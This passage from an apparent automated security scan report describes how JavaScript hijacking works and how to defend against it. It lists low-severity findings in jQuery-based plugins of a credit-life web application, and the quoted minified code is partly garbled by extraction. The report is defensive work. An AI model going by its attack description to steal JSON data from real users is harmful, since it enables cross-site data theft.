send up the appropriate session cookie with the request. In other words, this request will be handled just as
though it had originated from the legitimate application.
When the JSON array arrives on the client, it will be evaluated in the context of the malicious page. In order
to witness the evaluation of the JSON, the malicious page has redefined the JavaScript function used to
create new objects. In this way, the malicious code has inserted a hook that allows it to get access to the
creation of each object and transmit the object's contents back to the malicious site. Other attacks might
override the default constructor for arrays instead. Applications that are built to be used in a mashup
sometimes invoke a callback function at the end of each JavaScript message. The callback function is
meant to be defined by another application in the mashup. A callback function makes a JavaScript
hijacking attack a trivial affair -- all the attacker has to do is define the function. An application can be
mashup-friendly or it can be secure, but it cannot be both. If the user is not logged into the vulnerable site,
the attacker may compensate by asking the user to log in and then displaying the legitimate login page for
the application.
This is not a phishing attack -- the attacker does not gain access to the user's credentials -- so anti-
phishing countermeasures will not be able to defeat the attack. More complex attacks could make a series
of requests to the application by using JavaScript to dynamically generate script tags. This same technique
is sometimes used to create application mashups. The only difference is that, in this mashup scenario, one
of the applications involved is malicious.
Recommendation
All programs that communicate using JavaScript should take the following defensive measures: 1) Decline
malicious requests: Include a hard-to-guess identifier, such as the session identifier, as part of each
request that will return JavaScript. This defeats cross-site request forgery attacks by allowing the server to
validate the origin of the request. 2) Prevent direct execution of the JavaScript response: Include
characters in the response that prevent it from being successfully handed off to a JavaScript interpreter
without modification. This prevents an attacker from using a
Issue Summary
Oct 5, 2018, 5:40 PM 77

Engine Breakdown
JavaScript Hijacking: Vulnerable Framework 19 0 0 19
Total 19 0 0 19
JavaScript Hijacking: Vulnerable Framework Low

Low
datatables/datatables.js, line 81920 (JavaScript Hijacking: Vulnerable Framework)
Issue Details
Sink Details
Taint Flags:
81917 * get async to the remainder of this function we use bInitHandedOff to indicate that
81918 * _fnInitialise will be fired by the returned Ajax handler, rather than the constructor
81919 */
81920 $.ajax( {
81921 dataType: 'json',
81922 url: oLanguage.sUrl,
81923 success: function ( json ) {

Low
datatables/datatables.js, line 78148 (JavaScript Hijacking: Vulnerable Framework)
Issue Details
Sink Details
Enclosing Method: _fnBuildAjax()
Taint Flags:
78145 else
78146 {
78147 // Object to extend the base settings
78148 oSettings.jqXHR = $.ajax( $.extend( baseAjax, ajax ) );
78149
78150 // Restore for next time around
78151 ajax.data = ajaxData;
Oct 5, 2018, 5:40 PM 78

datatables/datatables.js, line 78136 (JavaScript Hijacking: Vulnerable Framework) Low
Issue Details
Sink Details
Enclosing Method: _fnBuildAjax()
Taint Flags:
78133 else if ( oSettings.sAjaxSource || typeof ajax === 'string' )
78134 {
78135 // DataTables 1.9- compatibility
78136 oSettings.jqXHR = $.ajax( $.extend( baseAjax, {
78137 url: ajax || oSettings.sAjaxSource
78138 } ) );
78139 }

20181005_CLS.CLS.assets.global.plugins.fullcalendar
fullcalendar/fullcalendar.js, line 9457 (JavaScript Hijacking: Vulnerable Low
Framework)
Issue Details
Sink Details
Enclosing Method: _fetchEventSource()
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/plugins/fullcalendar/fullcalendar.js:9457
Taint Flags:
9454 }
9455
9456 t.pushLoading();
9457 $.ajax($.extend({}, ajaxDefaults, source, {
9458 data: data,
9459 success: function(events) {
9460 events = events || [];
Oct 5, 2018, 5:40 PM 79

inputmask
jquery-inputmask/jquery.inputmask.bundle.js, line 2473 (JavaScript Hijacking: Low
Vulnerable Framework)
Issue Details
Sink Details
Enclosing Method: mask()
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/plugins/jquery-inputmask/
jquery.inputmask.bundle.js:2473
Taint Flags:
2470 mask: function(opts) {
2471 opts.definitions["#"] = opts.definitions[9];
2472 var maskList = [];
2473 return $.ajax({
2474 url: opts.url,
2475 async: !1,
2476 dataType: "json",

inputmask.inputmask
jquery-inputmask/inputmask/inputmask.phone.extensions.js, line 18 (JavaScript Low
Hijacking: Vulnerable Framework)
Issue Details
Sink Details
Enclosing Method: mask()
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/plugins/jquery-inputmask/inputmask/
inputmask.phone.extensions.js:18
Taint Flags:
15 mask: function(opts) {
16 opts.definitions["#"] = opts.definitions[9];
17 var maskList = [];
18 return $.ajax({
19 url: opts.url,
20 async: !1,
Oct 5, 2018, 5:40 PM 80

validation.js
jquery-validation/js/jquery.validate.js, line 1329 (JavaScript Hijacking: Vulnerable Low
Framework)
Issue Details
Sink Details
Enclosing Method: remote()
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/plugins/jquery-validation/js/
jquery.validate.js:1329
Taint Flags:
1326 this.startRequest( element );
1327 data = {};
1328 data[ element.name ] = value;
1329 $.ajax( $.extend( true, {
1330 mode: "abort",
1331 port: "validate" + element.name,

Low
app.js, line 144 (JavaScript Hijacking: Vulnerable Framework)
Issue Details
Scan Engine: SCA (Data Flow)
Source Details
Source: Read type
From: lambda
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/scripts/ap
p.js:145
142 overlayColor: 'none'
143 });
144 $.ajax({
145 type: "GET",
146 cache: false,
147 url: url,
148 dataType: "html",
Sink Details
Oct 5, 2018, 5:40 PM 81

Low
app.js, line 144 (JavaScript Hijacking: Vulnerable Framework)
Sink: ajax(0)
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/scripts/app.js:144
Taint Flags: HTTP_GET
141 animate: true,
142 overlayColor: 'none'
143 });
144 $.ajax({
145 type: "GET",
146 cache: false,
147 url: url,

Low
app.min.js, line 1 (JavaScript Hijacking: Vulnerable Framework)
Issue Details
Source Details
Source: Read type
From: lambda
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/scripts/ap
p.min.js:1
1 var App=function(){var t,e=!1,o=!1,a=!1,i=!1,n=[],l="../../
assets/",s="global/img/",r="global/plugins/",c="global/
css/",d={blue:"#89C4F4",red:"#F3565D",green:"#1bbc9b",purple:"#9b59b6",grey:"#95a5a6",
{"rtl"===$("body").css("direction")&&(e=!0),o=!!navigator.userAgent.match(/
MSIE 8.0/),a=!!navigator.userAgent.match(/MSIE 9.0/),i=!!
navigator.userAgent.match(/MSIE 10.0/),i&&$("html").addClass("ie10"),(i||a||
o)&&$("html").addClass("ie")},p=function(){for(var t=0;t<n.length;t++){var
e=n[t];e.call()}},u=function(){var t;if(o){var e;$(window).resize(function()
{e!
=document.documentElement.clientHeight&&(t&&clearTimeout(t),t=setTimeout(function()
{p()},50),e=document.documentElement.clientHeight)})}else $
(window).resize(function(){t&&clearTimeout(t),t=setTimeout(function(){p()},
50)})},f=function(){$("body").on("click",".portlet > .portlet-title > .tools
> a.remove",function(t){t.preventDefault();var e=$(this).closest(".portlet");$
("body").hasClass("page-portlet-fullscreen")&&$("body").removeClass("page-
portlet-fullscreen"),e.find(".portlet-
> .config").tooltip("destroy"),e.find(".portlet-title > .tools
> .collapse, .portlet > .portlet-title > .tools
> .expand").tooltip("destroy"),e.remove()}),$("body").on("click",".portlet
Oct 5, 2018, 5:40 PM 82

app.min.js, line 1 (JavaScript Hijacking: Vulnerable Framework) Low
> .portlet-title .fullscreen",function(t){t.preventDefault();var e=$

(this).closest(".portlet");if(e.hasClass("portlet-fullscreen"))$
(this).removeClass("on"),e.removeClass("portlet-fullscreen"),$
("body").removeClass("page-portlet-fullscreen"),e.children(".portlet-
body").css("height","auto");else{var o=App.getViewPort().height-
e.children(".portlet-title").outerHeight()-parseInt(e.children(".portlet-
body").css("padding-top"))-parseInt(e.children(".portlet-body").css("padding-
bottom"));$(this).addClass("on"),e.addClass("portlet-fullscreen"),$
("body").addClass("page-portlet-fullscreen"),e.children(".portlet-
body").css("height",o)}}),$("body").on("click",".portlet > .portlet-title
> .tools > a.reload",function(t){t.preventDefault();var e=$
(this).closest(".portlet").children(".portlet-body"),o=$(this).attr("data-
url"),a=$(this).attr("data-error-display");o?(App.blockUI({target:e,animate:!
0,overlayColor:"none"}),$.ajax({type:"GET",cache:!
1,url:o,dataType:"html",success:function(t)
{App.unblockUI(e),e.html(t),App.initAjax()},error:function(t,o,i)
{App.unblockUI(e);var n="Error on reloading the content. Please check your
connection and try again.";"toastr"==a&&toastr?toastr.error(n):"notific8"==a&&
$.notific8?($.notific8("zindex",11500),$.notific8(n,{theme:"ruby",life:
3e3})):alert(n)}})):(App.blockUI({target:e,animate:!
0,overlayColor:"none"}),window.setTimeout(function(){App.unblockUI(e)},
1e3))}),$('.portlet .portlet-title a.reload[data-load="true"]').click(),$
("body").on("click",".portlet > .portlet-title > .tools
> .collapse, .portlet .portlet-title > .tools > .expand",function(t)
{t.preventDefault();var e=$(this).closest(".portlet").children(".portlet-
body");$(this).hasClass("collapse")?($
(this).removeClass("expand").addClass("collapse"),e.slideDown(200))})},b=function()
{if($().uniform){var t=$("input[type=checkbox]:not(.toggle, .md-check, .md-
radiobtn, .make-switch, .icheck), input[type=radio]:not(.toggle, .md-
check, .md-radiobtn, .star, .make-
switch, .icheck)");t.size()>0&&t.each(function(){0===$
(this).uniform())})}},g=function(){if($("body").on("click",".md-checkbox >
label, .md-radio > label",function(){var t=$(this),e=$
(this).children("span:first-child");e.addClass("inc");var o=e.clone(!
0);e.before(o),$("."+e.attr("class")+":last",t).remove()}),$
("body").hasClass("page-md")){var t,e,o,a,i;$("body").on("click","a.btn,
button.btn, input.btn, label.btn",function(n){t=$(this),0==t.find(".md-click-
circle").length&&t.prepend("<span class='md-click-circle'></
span>"),e=t.find(".md-click-circle"),e.removeClass("md-click-
animate"),e.height()||e.width()||
t.offset().left-e.width()/2,i=n.pageY-t.offset().top-e.height()/2,e.css({top:i
+"px",left:a+"px"}).addClass("md-click-animate"),setTimeout(function()
{e.remove()},1e3)})}var n=function(t){""!=t.val()?
t.addClass("edited"):t.removeClass("edited")};$("body").on("keydown",".form-
md-floating-label .form-control",function(t){n($(this))}),$
Oct 5, 2018, 5:40 PM 83

("body").on("blur",".form-md-floating-label .form-control",function(t){n($
(this))}),$(".form-md-floating-label .form-control").each(function(){$
(this).val().length>0&&$(this).addClass("edited")})},m=function(){$().iCheck&&
$(".icheck").each(function(){var t=$(this).attr("data-checkbox")?$
(this).attr("data-checkbox"):"icheckbox_minimal-grey",e=$(this).attr("data-
radio")?$(this).attr("data-radio"):"iradio_minimal-
grey";t.indexOf("_line")>-1||e.indexOf("_line")>-1?$
(this).iCheck({checkboxClass:t,radioClass:e,insert:'<div class="icheck_line-
icon"></div>'+$(this).attr("data-label")}):$
(this).iCheck({checkboxClass:t,radioClass:e})})},v=function(){$
().bootstrapSwitch&&$(".make-switch").bootstrapSwitch()},y=function(){$
().confirmation&&$("[data-
toggle=confirmation]").confirmation({container:"body",btnOkClass:"btn btn-sm
btn-success",btnCancelClass:"btn btn-sm btn-danger"})},C=function(){$
("body").on("shown.bs.collapse",".accordion.scrollable",function(t)
{App.scrollTo($(t.target))})},k=function(){if(location.hash){var
t=encodeURI(location.hash.substr(1));$('a[href="#'+t+'"]').parents(".tab-
pane:hidden").each(function(){var t=$(this).attr("id");$('a[href="#'+t
+'"]').click()}),$('a[href="#'+t+'"]').click()}$().tabdrop&&$(".tabbable-
tabdrop .nav-pills, .tabbable-tabdrop .nav-tabs").tabdrop({text:'<i class="fa
fa-ellipsis-v"></i> <i class="fa fa-angle-down"></i>'})},x=function(){$
("body").on("hide.bs.modal",function(){$(".modal:visible").size()>1&&$
("html").hasClass("modal-open")===!1?$("html").addClass("modal-open"):$
(".modal:visible").size()<=1&&$("html").removeClass("modal-open")}),$
("body").on("show.bs.modal",".modal",function(){$(this).hasClass("modal-
scroll")&&$("body").addClass("modal-open-noscroll")}),$
("body").on("hide.bs.modal",".modal",function(){$("body").removeClass("modal-
open-noscroll")}),$("body").on("hidden.bs.modal",".modal:not(.modal-
cached)",function(){$(this).removeData("bs.modal")})},w=function(){$
(".tooltips").tooltip(),$(".portlet > .portlet-
title .fullscreen").tooltip({container:"body",title:"Fullscreen"}),$
(".portlet > .portlet-title > .tools
> .reload").tooltip({container:"body",title:"Reload"}),$(".portlet > .portlet-
title > .tools > .remove").tooltip({container:"body",title:"Remove"}),$
(".portlet > .portlet-title > .tools
> .config").tooltip({container:"body",title:"Settings"}),$(".portlet
> .portlet-title > .tools > .collapse, .portlet > .portlet-title > .tools
> .expand").tooltip({container:"body",title:"Collapse/Expand"})},I=function()
{$("body").on("click",".dropdown-menu.hold-on-click",function(t)
{t.stopPropagation()})},z=function(){$("body").on("click",'[data-
close="alert"]',function(t){$(this).parent(".alert").hide(),$
(this).closest(".note").hide(),t.preventDefault()}),$
(this).closest(".note").hide(),t.preventDefault()}),$
("body").on("click",'[data-remove="note"]',function(t){$
hover="dropdown"]').not(".hover-initialized").each(function(){$
(this).dropdownHover(),$(this).addClass("hover-initialized")})},S=function()
Oct 5, 2018, 5:40 PM 84

{"function"==typeof
autosize&&autosize(document.querySelector("textarea.autosizeme"))},P=function()
{$(".popovers").popover(),$(document).on("click.bs.popover.data-
api",function(e){t&&t.popover("hide")})},T=function()
{App.initSlimScroll(".scroller")},U=function(){jQuery.fancybox&&$(".fancybox-
button").size()>0&&$(".fancybox-button").fancybox({groupAttr:"data-
rel",prevEffect:"none",nextEffect:"none",closeBtn:!0,helpers:{title:
{type:"inside"}}})},D=function(){$().counterUp&&$("[data-
("input[placeholder]:not(.placeholder-no-fix),
textarea[placeholder]:not(.placeholder-no-fix)").each(function(){var t=$
(this);""===t.val()&&""!
==t.attr("placeholder")&&t.addClass("placeholder").val(t.attr("placeholder")),t.focus(
t.val()==t.attr("placeholder"))&&t.val(t.attr("placeholder"))})})},G=function()
{$().select2&&($.fn.select2.defaults.set("theme","bootstrap"),$
(".select2me").select2({placeholder:"Select",width:"auto",allowClear:!
0}))},H=function(){$("[data-auto-height]").each(function(){var t=$(this),e=$
("[data-height]",t),o=0,a=t.attr("data-mode"),i=parseInt(t.attr("data-
offset")?t.attr("data-offset"):0);e.each(function(){"height"==$
(this).attr("data-height")?$(this).css("height",""):$(this).css("min-
height","");var t="base-height"==a?$(this).outerHeight():$(this).outerHeight(!
0);t>o&&(o=t)}),o+=i,e.each(function(){"height"==$(this).attr("data-height")?$
(this).css("height",o):$(this).css("min-height",o)}),t.attr("data-related")&&$
(t.attr("data-related")).css("height",t.height())})};return{init:function()
{h(),u(),g(),b(),m(),v(),T(),U(),G(),f(),z(),I(),k(),w(),P(),C(),x(),y(),S(),D(),this.
{this.initAjax()},setLastPopedPopover:function(e)
{t=e},addResizeHandler:function(t){n.push(t)},runResizeHandlers:function()
{p()},scrollTo:function(t,e){var o=t&&t.size()>0?t.offset().top:0;t&&($
("body").hasClass("page-header-fixed")?o-=$(".page-header").height():$
("body").hasClass("page-header-menu-fixed")&&(o-=$(".page-header-
menu").height()),o+=e?e:-1*t.height()),$
("html,body").animate({scrollTop:o},"slow")},initSlimScroll:function(t){$
(t).each(function(){if(!$(this).attr("data-initialized")){var t;t=$
(this).attr("data-height")?$(this).attr("data-height"):$(this).css("height"),$
(this).slimScroll({allowPageScroll:!0,size:"7px",color:$(this).attr("data-
handle-color")?$(this).attr("data-handle-color"):"#bbb",wrapperClass:$
(this).attr("data-wrapper-class")?$(this).attr("data-wrapper-
class"):"slimScrollDiv",railColor:$(this).attr("data-rail-color")?$
(this).attr("data-rail-
color"):"#eaeaea",position:e?"left":"right",height:t,alwaysVisible:"1"==$
(this).attr("data-always-visible")?!0:!1,railVisible:"1"==$(this).attr("data-
rail-visible")?!0:!1,disableFadeOut:!0}),$(this).attr("data-
initialized","1")}})},destroySlimScroll:function(t){$(t).each(function()
{if("1"===$(this).attr("data-initialized")){$(this).removeAttr("data-
initialized"),$(this).removeAttr("style");var t={};$(this).attr("data-handle-
Oct 5, 2018, 5:40 PM 85

color")&&(t["data-handle-color"]=$(this).attr("data-handle-color")),$
(this).attr("data-wrapper-class")&&(t["data-wrapper-class"]=$
(this).attr("data-wrapper-class")),$(this).attr("data-rail-color")&&(t["data-
rail-color"]=$(this).attr("data-rail-color")),$(this).attr("data-always-
visible")&&(t["data-always-visible"]=$(this).attr("data-always-visible")),$
(this).attr("data-rail-visible")&&(t["data-rail-visible"]=$(this).attr("data-
rail-visible")),$(this).slimScroll({wrapperClass:$(this).attr("data-wrapper-
class")?$(this).attr("data-wrapper-class"):"slimScrollDiv",destroy:!0});var e=
$(this);$.each(t,function(t,o){e.attr(t,o)})}})},scrollTop:function()
{App.scrollTo()},blockUI:function(t){t=$.extend(!0,{},t);var
e="";if(e=t.animate?'<div class="loading-message '+(t.boxed?"loading-message-
boxed":"")+'"><div class="block-spinner-bar"><div class="bounce1"></div><div
class="bounce2"></div><div class="bounce3"></div></div></
div>':t.iconOnly?'<div class="loading-message '+(t.boxed?"loading-message-
boxed":"")+'"><img src="'+this.getGlobalImgPath()+'loading-spinner-grey.gif"
align=""></div>':t.textOnly?'<div class="loading-message '+(t.boxed?"loading-
message-boxed":"")+'"><span>  '+(t.message?t.message:"LOADING...")
+"</span></div>":'<div class="loading-message '+(t.boxed?"loading-message-
boxed":"")+'"><img src="'+this.getGlobalImgPath()+'loading-spinner-grey.gif"
align=""><span>  '+(t.message?t.message:"LOADING...")+"</span></
div>",t.target){var o=$(t.target);o.height()<=$(window).height()&&(t.cenrerY=!
0),o.block({message:e,baseZ:t.zIndex?t.zIndex:1e3,centerY:void 0!==t.cenrerY?
t.cenrerY:!1,css:
{backgroundColor:t.overlayColor?t.overlayColor:"#555",opacity:t.boxed?.
05:.1,cursor:"wait"}})}else $.blockUI({message:e,baseZ:t.zIndex?t.zIndex:
1e3,css:{border:"0",padding:"0",backgroundColor:"none"},overlayCSS:
{backgroundColor:t.overlayColor?t.overlayColor:"#555",opacity:t.boxed?.
05:.1,cursor:"wait"}})},unblockUI:function(t){t?$
(t).unblock({onUnblock:function(){$(t).css("position",""),$
(t).css("zoom","")}}):$.unblockUI()},startPageLoading:function(t)
{t&&t.animate?($(".page-spinner-bar").remove(),$("body").append('<div
class="page-spinner-bar"><div class="bounce1"></div><div class="bounce2"></
div><div class="bounce3"></div></div>')):($(".page-loading").remove(),$
("body").append('<div class="page-loading"><img src="'+this.getGlobalImgPath()
+'loading-spinner-grey.gif"/>  <span>'+(t&&t.message?
t.message:"Loading...")+"</span></div>"))},stopPageLoading:function(){$
(".page-loading, .page-spinner-bar").remove()},alert:function(t){t=$.extend(!
0,{container:"",place:"append",type:"success",message:"",close:!0,reset:!
0,focus:!0,closeInSeconds:0,icon:""},t);var
e=App.getUniqueID("App_alert"),o='<div id="'+e+'" class="custom-alerts alert
alert-'+t.type+' fade in">'+(t.close?'<button type="button" class="close"
data-dismiss="alert" aria-hidden="true"></button>':"")+(""!==t.icon?'<i
class="fa-lg fa fa-'+t.icon+'"></i> ':"")+t.message+"</div>";return t.reset&&$
(".custom-alerts").remove(),t.container?"append"==t.place?$
(t.container).append(o):$(t.container).prepend(o):1===$(".page-fixed-main-
content").size()?$(".page-fixed-main-content").prepend(o):($
("body").hasClass("page-container-bg-solid")||$("body").hasClass("page-
Oct 5, 2018, 5:40 PM 86

content-white"))&&0===$(".page-head").size()?$(".page-title").after(o):$
(".page-bar").size()>0?$(".page-bar").after(o):$(".page-
breadcrumb, .breadcrumbs").after(o),t.focus&&App.scrollTo($
(this).uniform())}):b()},updateUniform:function(t)
{$.uniform.update(t)},initFancybox:function(){U()},getActualVal:function(t)
{return t=$
(t),t.val()===t.attr("placeholder")?"":t.val()},getURLParameter:function(t)
{var
+)if(o=i[e].split("="),o[0]==t)return unescape(o[1]);return
null},isTouchDevice:function(){try{return document.createEvent("TouchEvent"),!
0}catch(t){return!1}},getViewPort:function(){var
t=window,e="inner";return"innerWidth"in window||
(e="client",t=document.documentElement||document.body),{width:t[e
+"Width"],height:t[e+"Height"]}},getUniqueID:function(t)
{return"prefix_"+Math.floor(Math.random()*(new
Date).getTime())},isIE8:function(){return o},isIE9:function(){return
a},isRTL:function(){return e},isAngularJsApp:function()
l},setAssetsPath:function(t){l=t},setGlobalImgPath:function(t)
{s=t},getGlobalImgPath:function(){return l+s},setGlobalPluginsPath:function(t)
{r=t},getGlobalPluginsPath:function(){return l+r},getGlobalCssPath:function()
{return l+c},getBrandColor:function(t){return d[t]?
d[t]:""},getResponsiveBreakpoint:function(t){var e={xs:480,sm:768,md:992,lg:
1200};return e[t]?e[t]:0}}}();jQuery(document).ready(function(){App.init()});
2
3 undefined
4 undefined
5 undefined
6 undefined
7 undefined
Sink Details
Sink: ajax(0)
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/scripts/app.min.js:1
1 var App=function(){var t,e=!1,o=!1,a=!1,i=!1,n=[],l="../../assets/",s="global/
img/",r="global/plugins/",c="global/
css/",d={blue:"#89C4F4",red:"#F3565D",green:"#1bbc9b",purple:"#9b59b6",grey:"#95a5a6",yellow:"#F8CB00"},h
{"rtl"===$("body").css("direction")&&(e=!0),o=!!navigator.userAgent.match(/MSIE 8.0/),a=!!
navigator.userAgent.match(/MSIE 9.0/),i=!!navigator.userAgent.match(/MSIE 10.0/),i&&$
("html").addClass("ie10"),(i||a||o)&&$("html").addClass("ie")},p=function(){for(var
Oct 5, 2018, 5:40 PM 87

t=0;t<n.length;t++){var e=n[t];e.call()}},u=function(){var t;if(o){var e;$

(window).resize(function(){e!
=document.documentElement.clientHeight&&(t&&clearTimeout(t),t=setTimeout(function(){p()},
50),e=document.documentElement.clientHeight)})}else $(window).resize(function()
{t&&clearTimeout(t),t=setTimeout(function(){p()},50)})},f=function(){$
("body").on("click",".portlet > .portlet-title > .tools > a.remove",function(t)
{t.preventDefault();var e=$(this).closest(".portlet");$("body").hasClass("page-portlet-
fullscreen")&&$("body").removeClass("page-portlet-fullscreen"),e.find(".portlet-
> .config").tooltip("destroy"),e.find(".portlet-title > .tools > .collapse, .portlet
> .portlet-title > .tools > .expand").tooltip("destroy"),e.remove()}),$
("body").on("click",".portlet > .portlet-title .fullscreen",function(t){t.preventDefault();var
e=$(this).closest(".portlet");if(e.hasClass("portlet-fullscreen"))$
(this).removeClass("on"),e.removeClass("portlet-fullscreen"),$("body").removeClass("page-
portlet-fullscreen"),e.children(".portlet-body").css("height","auto");else{var
o=App.getViewPort().height-e.children(".portlet-title").outerHeight()-
parseInt(e.children(".portlet-body").css("padding-top"))-parseInt(e.children(".portlet-
body").css("padding-bottom"));$(this).addClass("on"),e.addClass("portlet-fullscreen"),$
("body").addClass("page-portlet-fullscreen"),e.children(".portlet-body").css("height",o)}}),$
("body").on("click",".portlet > .portlet-title > .tools > a.reload",function(t)
{t.preventDefault();var e=$(this).closest(".portlet").children(".portlet-body"),o=$
(this).attr("data-url"),a=$(this).attr("data-error-display");o?(App.blockUI({target:e,animate:!
0,overlayColor:"none"}),$.ajax({type:"GET",cache:!1,url:o,dataType:"html",success:function(t)
{App.unblockUI(e),e.html(t),App.initAjax()},error:function(t,o,i){App.unblockUI(e);var
n="Error on reloading the content. Please check your connection and try
again.";"toastr"==a&&toastr?toastr.error(n):"notific8"==a&&$.notific8?($.notific8("zindex",
11500),$.notific8(n,{theme:"ruby",life:3e3})):alert(n)}})):(App.blockUI({target:e,animate:!
0,overlayColor:"none"}),window.setTimeout(function(){App.unblockUI(e)},1e3))}),$
('.portlet .portlet-title a.reload[data-load="true"]').click(),$("body").on("click",".portlet
> .portlet-title > .tools > .collapse, .portlet .portlet-title > .tools > .expand",function(t)
{t.preventDefault();var e=$(this).closest(".portlet").children(".portlet-body");$
(this).hasClass("collapse")?($
(this).removeClass("expand").addClass("collapse"),e.slideDown(200))})},b=function(){if($
().uniform){var t=$("input[type=checkbox]:not(.toggle, .md-check, .md-radiobtn, .make-
switch, .icheck), input[type=radio]:not(.toggle, .md-check, .md-radiobtn, .star, .make-
switch, .icheck)");t.size()>0&&t.each(function(){0===$(this).parents(".checker").size()&&($
(this).show(),$(this).uniform())})}},g=function(){if($("body").on("click",".md-checkbox >
label, .md-radio > label",function(){var t=$(this),e=$(this).children("span:first-
child");e.addClass("inc");var o=e.clone(!0);e.before(o),$("."+e.attr("class")
+":last",t).remove()}),$("body").hasClass("page-md")){var t,e,o,a,i;$
("body").on("click","a.btn, button.btn, input.btn, label.btn",function(n){t=$(this),
0==t.find(".md-click-circle").length&&t.prepend("<span class='md-click-circle'></
span>"),e=t.find(".md-click-circle"),e.removeClass("md-click-animate"),e.height()||e.width()||
t.offset().left-e.width()/2,i=n.pageY-t.offset().top-e.height()/2,e.css({top:i+"px",left:a
+"px"}).addClass("md-click-animate"),setTimeout(function(){e.remove()},1e3)})}var n=function(t)
{""!=t.val()?t.addClass("edited"):t.removeClass("edited")};$("body").on("keydown",".form-md-
floating-label .form-control",function(t){n($(this))}),$("body").on("blur",".form-md-floating-
label .form-control",function(t){n($(this))}),$(".form-md-floating-label .form-
control").each(function(){$(this).val().length>0&&$(this).addClass("edited")})},m=function(){$
().iCheck&&$(".icheck").each(function(){var t=$(this).attr("data-checkbox")?$(this).attr("data-
checkbox"):"icheckbox_minimal-grey",e=$(this).attr("data-radio")?$(this).attr("data-
radio"):"iradio_minimal-grey";t.indexOf("_line")>-1||e.indexOf("_line")>-1?$
(this).iCheck({checkboxClass:t,radioClass:e,insert:'<div class="icheck_line-icon"></div>'+$
(this).attr("data-label")}):$(this).iCheck({checkboxClass:t,radioClass:e})})},v=function(){$
().bootstrapSwitch&&$(".make-switch").bootstrapSwitch()},y=function(){$().confirmation&&$
Oct 5, 2018, 5:40 PM 88

("[data-toggle=confirmation]").confirmation({container:"body",btnOkClass:"btn btn-sm btn-

success",btnCancelClass:"btn btn-sm btn-danger"})},C=function(){$
("body").on("shown.bs.collapse",".accordion.scrollable",function(t){App.scrollTo($
(t.target))})},k=function(){if(location.hash){var t=encodeURI(location.hash.substr(1));$
('a[href="#'+t+'"]').parents(".tab-pane:hidden").each(function(){var t=$(this).attr("id");$
('a[href="#'+t+'"]').click()}),$('a[href="#'+t+'"]').click()}$().tabdrop&&$(".tabbable-
tabdrop .nav-pills, .tabbable-tabdrop .nav-tabs").tabdrop({text:'<i class="fa fa-ellipsis-v"></
i> <i class="fa fa-angle-down"></i>'})},x=function(){$
("body").on("hide.bs.modal",function(){$(".modal:visible").size()>1&&$("html").hasClass("modal-
open")===!1?$("html").addClass("modal-open"):$(".modal:visible").size()<=1&&$
("html").removeClass("modal-open")}),$("body").on("show.bs.modal",".modal",function(){$
(this).hasClass("modal-scroll")&&$("body").addClass("modal-open-noscroll")}),$
("body").on("hide.bs.modal",".modal",function(){$("body").removeClass("modal-open-noscroll")}),
$("body").on("hidden.bs.modal",".modal:not(.modal-cached)",function(){$
(this).removeData("bs.modal")})},w=function(){$(".tooltips").tooltip(),$(".portlet > .portlet-
title .fullscreen").tooltip({container:"body",title:"Fullscreen"}),$(".portlet > .portlet-
title > .tools > .reload").tooltip({container:"body",title:"Reload"}),$(".portlet > .portlet-
title > .tools > .remove").tooltip({container:"body",title:"Remove"}),$(".portlet > .portlet-
title > .tools > .config").tooltip({container:"body",title:"Settings"}),$(".portlet > .portlet-
title > .tools > .collapse, .portlet > .portlet-title > .tools
> .expand").tooltip({container:"body",title:"Collapse/Expand"})},I=function(){$
("body").on("click",".dropdown-menu.hold-on-click",function(t)
{t.stopPropagation()})},z=function(){$("body").on("click",'[data-close="alert"]',function(t){$
(this).parent(".alert").hide(),$(this).closest(".note").hide(),t.preventDefault()}),$
(this).closest(".note").hide(),t.preventDefault()}),$("body").on("click",'[data-
remove="note"]',function(t){$
hover="dropdown"]').not(".hover-initialized").each(function(){$(this).dropdownHover(),$
(this).addClass("hover-initialized")})},S=function(){"function"==typeof
autosize&&autosize(document.querySelector("textarea.autosizeme"))},P=function(){$
(".popovers").popover(),$(document).on("click.bs.popover.data-api",function(e)
{t&&t.popover("hide")})},T=function(){App.initSlimScroll(".scroller")},U=function()
{jQuery.fancybox&&$(".fancybox-button").size()>0&&$(".fancybox-
button").fancybox({groupAttr:"data-rel",prevEffect:"none",nextEffect:"none",closeBtn:!
0,helpers:{title:{type:"inside"}}})},D=function(){$().counterUp&&$("[data-
("input[placeholder]:not(.placeholder-no-fix), textarea[placeholder]:not(.placeholder-no-
fix)").each(function(){var t=$(this);""===t.val()&&""!
==t.attr("placeholder")&&t.addClass("placeholder").val(t.attr("placeholder")),t.focus(function()
t.val()==t.attr("placeholder"))&&t.val(t.attr("placeholder"))})})},G=function(){$
().select2&&($.fn.select2.defaults.set("theme","bootstrap"),$
(".select2me").select2({placeholder:"Select",width:"auto",allowClear:!0}))},H=function(){$
("[data-auto-height]").each(function(){var t=$(this),e=$("[data-height]",t),o=0,a=t.attr("data-
mode"),i=parseInt(t.attr("data-offset")?t.attr("data-offset"):0);e.each(function(){"height"==$
(this).attr("data-height")?$(this).css("height",""):$(this).css("min-height","");var t="base-
height"==a?$(this).outerHeight():$(this).outerHeight(!0);t>o&&(o=t)}),o+=i,e.each(function()
{"height"==$(this).attr("data-height")?$(this).css("height",o):$(this).css("min-
height",o)}),t.attr("data-related")&&$(t.attr("data-
related")).css("height",t.height())})};return{init:function()
{h(),u(),g(),b(),m(),v(),T(),U(),G(),f(),z(),I(),k(),w(),P(),C(),x(),y(),S(),D(),this.addResizeHandler(H)
{this.initAjax()},setLastPopedPopover:function(e){t=e},addResizeHandler:function(t)
{n.push(t)},runResizeHandlers:function(){p()},scrollTo:function(t,e){var o=t&&t.size()>0?
t.offset().top:0;t&&($("body").hasClass("page-header-fixed")?o-=$(".page-header").height():$
("body").hasClass("page-header-menu-fixed")&&(o-=$(".page-header-menu").height()),o+=e?
e:-1*t.height()),$("html,body").animate({scrollTop:o},"slow")},initSlimScroll:function(t){$
Oct 5, 2018, 5:40 PM 89

